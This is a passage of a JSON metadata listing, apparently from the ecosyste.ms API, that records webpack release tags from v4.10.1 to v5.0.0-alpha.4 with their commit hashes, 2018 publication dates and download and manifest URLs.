webpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos